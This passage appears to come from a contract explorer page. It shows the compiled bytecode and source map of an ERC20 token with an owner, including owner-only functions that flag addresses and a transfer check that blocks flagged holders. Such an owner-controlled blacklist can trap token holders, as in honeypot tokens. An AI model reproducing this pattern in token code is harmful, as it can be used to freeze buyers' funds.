fffffffffffffffffffffffffffffffffffffffffffffffffffffff820361150457611503611498565b5b600182019050919050565b600061151a82611160565b915061152583611160565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561155a57611559611498565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115c1602583611048565b91506115cc82611565565b604082019050919050565b600060208201905081810360008301526115f0816115b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611653602683611048565b915061165e826115f7565b604082019050919050565b6000602082019050818103600083015261168281611646565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116e5602483611048565b91506116f082611689565b604082019050919050565b60006020820190508181036000830152611714816116d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611777602283611048565b91506117828261171b565b604082019050919050565b600060208201905081810360008301526117a68161176a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117e3602083611048565b91506117ee826117ad565b602082019050919050565b60006020820190508181036000830152611812816117d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061184f601d83611048565b915061185a82611819565b602082019050919050565b6000602082019050818103600083015261187e81611842565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118e1602583611048565b91506118ec82611885565b604082019050919050565b60006020820190508181036000830152611910816118d4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611973602383611048565b915061197e82611917565b604082019050919050565b600060208201905081810360008301526119a281611966565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a05602683611048565b9150611a10826119a9565b604082019050919050565b60006020820190508181036000830152611a34816119f8565b9050919050565b50565b6000611a4b600083611048565b9150611a5682611a3b565b600082019050919050565b60006020820190508181036000830152611a7a81611a3e565b905091905056fea26469706673582212200c11e688931a1db36bb2dba8f504d42f1dfbd8442fab53a70cdb8bfff1064b3964736f6c634300080d0033
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063fc88d6a7146103685761010b565b8063715018a6146102465780638b535da2146102505780638da5cb5b1461028057806395d89b411461029e5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e657806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806322f45deb1461017c575b600080fd5b610118610384565b60405161012591906110d6565b60405180910390f35b61014860048036038101906101439190611196565b610416565b60405161015591906111f1565b60405180910390f35b610166610439565b604051610173919061121b565b60405180910390f35b6101966004803603810190610191919061129b565b610443565b005b6101b260048036038101906101ad91906112e8565b6104f0565b6040516101bf91906111f1565b60405180910390f35b6101d061051f565b6040516101dd9190611357565b60405180910390f35b61020060048036038101906101fb9190611196565b610528565b60405161020d91906111f1565b60405180910390f35b610230600480360381019061022b9190611372565b61055f565b60405161023d919061121b565b60405180910390f35b61024e6105a8565b005b61026a60048036038101906102659190611372565b6105bc565b60405161027791906111f1565b60405180910390f35b610288610612565b60405161029591906113ae565b60405180910390f35b6102a661063b565b6040516102b391906110d6565b60405180910390f35b6102d660048036038101906102d19190611196565b6106cd565b6040516102e391906111f1565b60405180910390f35b61030660048036038101906103019190611196565b610744565b60405161031391906111f1565b60405180910390f35b610336600480360381019061033191906113c9565b610767565b604051610343919061121b565b60405180910390f35b61036660048036038101906103619190611372565b6107ee565b005b610382600480360381019061037d919061129b565b610871565b005b60606005805461039390611438565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611438565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b60008061042161091e565b905061042e818585610926565b600191505092915050565b6000600454905090565b61044b610aef565b60005b828290508110156104eb5760016002600085858581811061047257610471611469565b5b90506020020160208101906104879190611372565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104e3906114c7565b91505061044e565b505050565b6000806104fb61091e565b9050610508858285610b6d565b610513858585610bf9565b60019150509392505050565b60006012905090565b60008061053361091e565b90506105548185856105458589610767565b61054f919061150f565b610926565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b0610aef565b6105ba6000610e72565b565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461064a90611438565b80601f016020809104026020016040519081016040528092919081815260200182805461067690611438565b80156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b6000806106d861091e565b905060006106e68286610767565b90508381101561072b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610722906115d7565b60405180910390fd5b6107388286868403610926565b60019250505092915050565b60008061074f61091e565b905061075c818585610bf9565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f6610aef565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610865576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085c90611669565b60405180910390fd5b61086e81610e72565b50565b610879610aef565b60005b82829050811015610919576000600260008585858181106108a05761089f611469565b5b90506020020160208101906108b59190611372565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610911906114c7565b91505061087c565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610995576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098c906116fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a04576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fb9061178d565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae2919061121b565b60405180910390a3505050565b610af761091e565b73ffffffffffffffffffffffffffffffffffffffff16610b15610612565b73ffffffffffffffffffffffffffffffffffffffff1614610b6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b62906117f9565b60405180910390fd5b565b6000610b798484610767565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bf35781811015610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc90611865565b60405180910390fd5b610bf28484848403610926565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5f906118f7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cce90611989565b60405180910390fd5b610ce2838383610f36565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6090611a1b565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e59919061121b565b60405180910390a3610e6c848484611038565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fd75750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110335760011515600760009054906101000a900460ff16151514611032576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102990611a61565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b83811115611086576000848401525b50505050565b6000601f19601f8301169050919050565b60006110a88261103d565b6110b28185611048565b93506110c2818560208601611059565b6110cb8161108c565b840191505092915050565b600060208201905081810360008301526110f0818461109d565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061112d82611102565b9050919050565b61113d81611122565b811461114857600080fd5b50565b60008135905061115a81611134565b92915050565b6000819050919050565b61117381611160565b811461117e57600080fd5b50565b6000813590506111908161116a565b92915050565b600080604083850312156111ad576111ac6110f8565b5b60006111bb8582860161114b565b92505060206111cc85828601611181565b9150509250929050565b60008115159050919050565b6111eb816111d6565b82525050565b600060208201905061120660008301846111e2565b92915050565b61121581611160565b82525050565b6000602082019050611230600083018461120c565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261125b5761125a611236565b5b8235905067ffffffffffffffff8111156112785761127761123b565b5b60208301915083602082028301111561129457611293611240565b5b9250929050565b600080602083850312156112b2576112b16110f8565b5b600083013567ffffffffffffffff8111156112d0576112cf6110fd565b5b6112dc85828601611245565b92509250509250929050565b600080600060608486031215611301576113006110f8565b5b600061130f8682870161114b565b93505060206113208682870161114b565b925050604061133186828701611181565b9150509250925092565b600060ff82169050919050565b6113518161133b565b82525050565b600060208201905061136c6000830184611348565b92915050565b600060208284031215611388576113876110f8565b5b60006113968482850161114b565b91505092915050565b6113a881611122565b82525050565b60006020820190506113c3600083018461139f565b92915050565b600080604083850312156113e0576113df6110f8565b5b60006113ee8582860161114b565b92505060206113ff8582860161114b565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145057607f821691505b60208210810361146357611462611409565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114d282611160565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361150457611503611498565b5b600182019050919050565b600061151a82611160565b915061152583611160565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561155a57611559611498565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006115c1602583611048565b91506115cc82611565565b604082019050919050565b600060208201905081810360008301526115f0816115b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611653602683611048565b915061165e826115f7565b604082019050919050565b6000602082019050818103600083015261168281611646565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116e5602483611048565b91506116f082611689565b604082019050919050565b60006020820190508181036000830152611714816116d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611777602283611048565b91506117828261171b565b604082019050919050565b600060208201905081810360008301526117a68161176a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117e3602083611048565b91506117ee826117ad565b602082019050919050565b60006020820190508181036000830152611812816117d6565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061184f601d83611048565b915061185a82611819565b602082019050919050565b6000602082019050818103600083015261187e81611842565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118e1602583611048565b91506118ec82611885565b604082019050919050565b60006020820190508181036000830152611910816118d4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611973602383611048565b915061197e82611917565b604082019050919050565b600060208201905081810360008301526119a281611966565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a05602683611048565b9150611a10826119a9565b604082019050919050565b60006020820190508181036000830152611a34816119f8565b9050919050565b50565b6000611a4b600083611048565b9150611a5682611a3b565b600082019050919050565b60006020820190508181036000830152611a7a81611a3e565b905091905056fea26469706673582212200c11e688931a1db36bb2dba8f504d42f1dfbd8442fab53a70cdb8bfff1064b3964736f6c634300080d0033
Deployed Bytecode Sourcemap
20528:140:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11616:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10385:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9793:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12397:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9692:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13101:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10556:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5843:103;;;:::i;:::-;;10207:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5202:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8949:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13842:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10889:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11145:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6101:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9998;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8730:100;8784:13;8817:5;8810:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;:::o;11616:201::-;11699:4;11716:13;11732:12;:10;:12::i;:::-;11716:28;;11755:32;11764:5;11771:7;11780:6;11755:8;:32::i;:::-;11805:4;11798:11;;;11616:201;;;;:::o;10385:108::-;10446:7;10473:12;;10466:19;;10385:108;:::o;9793:197::-;5088:13;:11;:13::i;:::-;9881:9:::1;9876:107;9900:11;;:18;;9896:1;:22;9876:107;;;9967:4;9940:8;:24;9949:11;;9961:1;9949:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9940:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;9920:3;;;;;:::i;:::-;;;;9876:107;;;;9793:197:::0;;:::o;12397:295::-;12528:4;12545:15;12563:12;:10;:12::i;:::-;12545:30;;12586:38;12602:4;12608:7;12617:6;12586:15;:38::i;:::-;12635:27;12645:4;12651:2;12655:6;12635:9;:27::i;:::-;12680:4;12673:11;;;12397:295;;;;;:::o;9692:93::-;9750:5;9775:2;9768:9;;9692:93;:::o;13101:238::-;13189:4;13206:13;13222:12;:10;:12::i;:::-;13206:28;;13245:64;13254:5;13261:7;13298:10;13270:25;13280:5;13287:7;13270:9;:25::i;:::-;:38;;;;:::i;:::-;13245:8;:64::i;:::-;13327:4;13320:11;;;13101:238;;;;:::o;10556:127::-;10630:7;10657:9;:18;10667:7;10657:18;;;;;;;;;;;;;;;;10650:25;;10556:127;;;:::o;5843:103::-;5088:13;:11;:13::i;:::-;5908:30:::1;5935:1;5908:18;:30::i;:::-;5843:103::o:0;10207:113::-;10268:4;10292:8;:20;10301:10;10292:20;;;;;;;;;;;;;;;;;;;;;;;;;10285:27;;10207:113;;;:::o;5202:87::-;5248:7;5275:6;;;;;;;;;;;5268:13;;5202:87;:::o;8949:104::-;9005:13;9038:7;9031:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8949:104;:::o;13842:436::-;13935:4;13952:13;13968:12;:10;:12::i;:::-;13952:28;;13991:24;14018:25;14028:5;14035:7;14018:9;:25::i;:::-;13991:52;;14082:15;14062:16;:35;;14054:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14175:60;14184:5;14191:7;14219:15;14200:16;:34;14175:8;:60::i;:::-;14266:4;14259:11;;;;13842:436;;;;:::o;10889:193::-;10968:4;10985:13;11001:12;:10;:12::i;:::-;10985:28;;11024;11034:5;11041:2;11045:6;11024:9;:28::i;:::-;11070:4;11063:11;;;10889:193;;;;:::o;11145:151::-;11234:7;11261:11;:18;11273:5;11261:18;;;;;;;;;;;;;;;:27;11280:7;11261:27;;;;;;;;;;;;;;;;11254:34;;11145:151;;;;:::o;6101:201::-;5088:13;:11;:13::i;:::-;6210:1:::1;6190:22;;:8;:22;;::::0;6182:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6266:28;6285:8;6266:18;:28::i;:::-;6101:201:::0;:::o;9998:::-;5088:13;:11;:13::i;:::-;10089:9:::1;10084:108;10108:11;;:18;;10104:1;:22;10084:108;;;10175:5;10148:8;:24;10157:11;;10169:1;10157:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10148:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;10128:3;;;;;:::i;:::-;;;;10084:108;;;;9998:201:::0;;:::o;3911:98::-;3964:7;3991:10;3984:17;;3911:98;:::o;17869:380::-;18022:1;18005:19;;:5;:19;;;17997:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18103:1;18084:21;;:7;:21;;;18076:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18187:6;18157:11;:18;18169:5;18157:18;;;;;;;;;;;;;;;:27;18176:7;18157:27;;;;;;;;;;;;;;;:36;;;;18225:7;18209:32;;18218:5;18209:32;;;18234:6;18209:32;;;;;;:::i;:::-;;;;;;;;17869:380;;;:::o;5367:132::-;5442:12;:10;:12::i;:::-;5431:23;;:7;:5;:7::i;:::-;:23;;;5423:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5367:132::o;18540:453::-;18675:24;18702:25;18712:5;18719:7;18702:9;:25::i;:::-;18675:52;;18762:17;18742:16;:37;18738:248;;18824:6;18804:16;:26;;18796:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18908:51;18917:5;18924:7;18952:6;18933:16;:25;18908:8;:51::i;:::-;18738:248;18664:329;18540:453;;;:::o;14748:840::-;14895:1;14879:18;;:4;:18;;;14871:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14972:1;14958:16;;:2;:16;;;14950:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15027:38;15048:4;15054:2;15058:6;15027:20;:38::i;:::-;15078:19;15100:9;:15;15110:4;15100:15;;;;;;;;;;;;;;;;15078:37;;15149:6;15134:11;:21;;15126:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15266:6;15252:11;:20;15234:9;:15;15244:4;15234:15;;;;;;;;;;;;;;;:38;;;;15469:6;15452:9;:13;15462:2;15452:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15519:2;15504:26;;15513:4;15504:26;;;15523:6;15504:26;;;;;;:::i;:::-;;;;;;;;15543:37;15563:4;15569:2;15573:6;15543:19;:37::i;:::-;14860:728;14748:840;;;:::o;6462:191::-;6536:16;6555:6;;;;;;;;;;;6536:25;;6581:8;6572:6;;:17;;;;;;;;;;;;;;;;;;6636:8;6605:40;;6626:8;6605:40;;;;;;;;;;;;6525:128;6462:191;:::o;19593:200::-;19723:8;:12;19732:2;19723:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;19739:8;:14;19748:4;19739:14;;;;;;;;;;;;;;;;;;;;;;;;;19723:30;19719:72;;;19782:4;19763:23;;:15;;;;;;;;;;;:23;;;19755:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;19719:72;19593:200;;;:::o;20397:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:117::-;3955:1;3952;3945:12;3969:117;4078:1;4075;4068:12;4092:117;4201:1;4198;4191:12;4232:568;4305:8;4315:6;4365:3;4358:4;4350:6;4346:17;4342:27;4332:122;;4373:79;;:::i;:::-;4332:122;4486:6;4473:20;4463:30;;4516:18;4508:6;4505:30;4502:117;;;4538:79;;:::i;:::-;4502:117;4652:4;4644:6;4640:17;4628:29;;4706:3;4698:4;4690:6;4686:17;4676:8;4672:32;4669:41;4666:128;;;4713:79;;:::i;:::-;4666:128;4232:568;;;;;:::o;4806:559::-;4892:6;4900;4949:2;4937:9;4928:7;4924:23;4920:32;4917:119;;;4955:79;;:::i;:::-;4917:119;5103:1;5092:9;5088:17;5075:31;5133:18;5125:6;5122:30;5119:117;;;5155:79;;:::i;:::-;5119:117;5268:80;5340:7;5331:6;5320:9;5316:22;5268:80;:::i;:::-;5250:98;;;;5046:312;4806:559;;;;;:::o;5371:619::-;5448:6;5456;5464;5513:2;5501:9;5492:7;5488:23;5484:32;5481:119;;;5519:79;;:::i;:::-;5481:119;5639:1;5664:53;5709:7;5700:6;5689:9;5685:22;5664:53;:::i;:::-;5654:63;;5610:117;5766:2;5792:53;5837:7;5828:6;5817:9;5813:22;5792:53;:::i;:::-;5782:63;;5737:118;5894:2;5920:53;5965:7;5956:6;5945:9;5941:22;5920:53;:::i;:::-;5910:63;;5865:118;5371:619;;;;;:::o;5996:86::-;6031:7;6071:4;6064:5;6060:16;6049:27;;5996:86;;;:::o;6088:112::-;6171:22;6187:5;6171:22;:::i;:::-;6166:3;6159:35;6088:112;;:::o;6206:214::-;6295:4;6333:2;6322:9;6318:18;6310:26;;6346:67;6410:1;6399:9;6395:17;6386:6;6346:67;:::i;:::-;6206:214;;;;:::o;6426:329::-;6485:6;6534:2;6522:9;6513:7;6509:23;6505:32;6502:119;;;6540:79;;:::i;:::-;6502:119;6660:1;6685:53;6730:7;6721:6;6710:9;6706:22;6685:53;:::i;:::-;6675:63;;6631:117;6426:329;;;;:::o;6761:118::-;6848:24;6866:5;6848:24;:::i;:::-;6843:3;6836:37;6761:118;;:::o;6885:222::-;6978:4;7016:2;7005:9;7001:18;6993:26;;7029:71;7097:1;7086:9;7082:17;7073:6;7029:71;:::i;:::-;6885:222;;;;:::o;7113:474::-;7181:6;7189;7238:2;7226:9;7217:7;7213:23;7209:32;7206:119;;;7244:79;;:::i;:::-;7206:119;7364:1;7389:53;7434:7;7425:6;7414:9;7410:22;7389:53;:::i;:::-;7379:63;;7335:117;7491:2;7517:53;7562:7;7553:6;7542:9;7538:22;7517:53;:::i;:::-;7507:63;;7462:118;7113:474;;;;;:::o;7593:180::-;7641:77;7638:1;7631:88;7738:4;7735:1;7728:15;7762:4;7759:1;7752:15;7779:320;7823:6;7860:1;7854:4;7850:12;7840:22;;7907:1;7901:4;7897:12;7928:18;7918:81;;7984:4;7976:6;7972:17;7962:27;;7918:81;8046:2;8038:6;8035:14;8015:18;8012:38;8009:84;;8065:18;;:::i;:::-;8009:84;7830:269;7779:320;;;:::o;8105:180::-;8153:77;8150:1;8143:88;8250:4;8247:1;8240:15;8274:4;8271:1;8264:15;8291:180;8339:77;8336:1;8329:88;8436:4;8433:1;8426:15;8460:4;8457:1;8450:15;8477:233;8516:3;8539:24;8557:5;8539:24;:::i;:::-;8530:33;;8585:66;8578:5;8575:77;8572:103;;8655:18;;:::i;:::-;8572:103;8702:1;8695:5;8691:13;8684:20;;8477:233;;;:::o;8716:305::-;8756:3;8775:20;8793:1;8775:20;:::i;:::-;8770:25;;8809:20;8827:1;8809:20;:::i;:::-;8804:25;;8963:1;8895:66;8891:74;8888:1;8885:81;8882:107;;;8969:18;;:::i;:::-;8882:107;9013:1;9010;9006:9;8999:16;;8716:305;;;;:::o;9027:224::-;9167:34;9163:1;9155:6;9151:14;9144:58;9236:7;9231:2;9223:6;9219:15;9212:32;9027:224;:::o;9257:366::-;9399:3;9420:67;9484:2;9479:3;9420:67;:::i;:::-;9413:74;;9496:93;9585:3;9496:93;:::i;:::-;9614:2;9609:3;9605:12;9598:19;;9257:366;;;:::o;9629:419::-;9795:4;9833:2;9822:9;9818:18;9810:26;;9882:9;9876:4;9872:20;9868:1;9857:9;9853:17;9846:47;9910:131;10036:4;9910:131;:::i;:::-;9902:139;;9629:419;;;:::o;10054:225::-;10194:34;10190:1;10182:6;10178:14;10171:58;10263:8;10258:2;10250:6;10246:15;10239:33;10054:225;:::o;10285:366::-;10427:3;10448:67;10